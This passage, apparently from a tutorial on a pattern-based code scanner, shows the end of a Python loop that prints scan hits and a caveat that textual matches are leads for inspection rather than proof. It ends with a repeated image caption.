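        hits = scan(src)
        print(label, verdict(hits), score(hits))
        for f in hits:
            print(f"  line {f.line:>2}  {f.rule:<18} {f.snippet}")
```

The patterns are textual, so they also match inside comments and miss code that builds function names dynamically; treat a hit as a reason to inspect the file, not as proof.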

I-47 Shell Screenshot

i-47 shell screenshot
